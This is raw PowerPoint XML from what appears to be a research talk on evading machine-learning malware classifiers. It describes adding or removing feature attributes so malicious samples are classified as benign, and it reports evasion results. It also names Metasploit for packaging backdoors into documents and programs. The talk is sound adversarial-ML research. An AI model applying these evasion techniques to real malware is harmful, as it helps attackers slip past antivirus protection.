                </a:solidFill>
              </a:rPr>
              <a:t> Relative  Ratio (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PR - NR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Sort all attributes by RR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1334825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dissolv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dissolv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dissolv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Instance modification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>strategy (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2121868" y="1434353"/>
            <a:ext cx="10070132" cy="5423647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> instance in the test set:  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>that have top n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>highest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>RRs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>     or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>that have top n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lowest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>RRs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Add: making virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Remove: making virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> samples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482436" y="6239562"/>
            <a:ext cx="10598727" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>samples; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: attribute X appears more often in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> samples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49328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dissolv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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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dissolv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Result: Adding Highest N Attributes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64285" y="1264555"/>
            <a:ext cx="7302603" cy="5465072"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7835154" y="4317313"/>
            <a:ext cx="1631575" cy="154560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9702874" y="3193929"/>
            <a:ext cx="3603475" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17.3%(13/75)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are classified </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as +1!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411522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9383922" cy="1280890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Test Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: Removing Lowest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>N Attributes</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55796" y="1264555"/>
            <a:ext cx="7474139" cy="5593445"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7835154" y="4317313"/>
            <a:ext cx="1631575" cy="154560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9702874" y="3193929"/>
            <a:ext cx="3603475" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17.3%(13/75)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All instances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are classified </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as +1!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1489001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Result: Combined</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92925" y="1264555"/>
            <a:ext cx="7474139" cy="5593445"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5235388" y="3174976"/>
            <a:ext cx="4285130" cy="70248"/>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9520518" y="2545445"/>
            <a:ext cx="3603475" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Removing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attributes is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more efficient!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="953691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vs. Existing Hiding Schemes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Our strategy is close to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> of two existing hiding schemes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Disguise as popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>formats/programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Polymorphic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Single scheme above is not effective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> against modern antivirus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2201532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Disguise as Popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ile Formats or Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Useful tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Community Edition penetration-testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ackage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>exploits or backdoors into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>files (.doc, .pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) or programs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>calc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8494062" y="4536510"/>
            <a:ext cx="1835465" cy="1835465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2758333" y="4536510"/>
            <a:ext cx="1835466" cy="1835466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931738" y="4331367"/>
            <a:ext cx="1644822" cy="2040607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3576357" y="4896998"/>
            <a:ext cx="1802901" cy="1707002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6417526" y="4896998"/>
            <a:ext cx="1802901" cy="1707002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9198575" y="4896998"/>
            <a:ext cx="1802901" cy="1707002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5470902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Disguise as Popular File Formats or Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165177" y="1904998"/>
            <a:ext cx="5059159" cy="4797479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481011" y="2723146"/>
            <a:ext cx="5358063" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
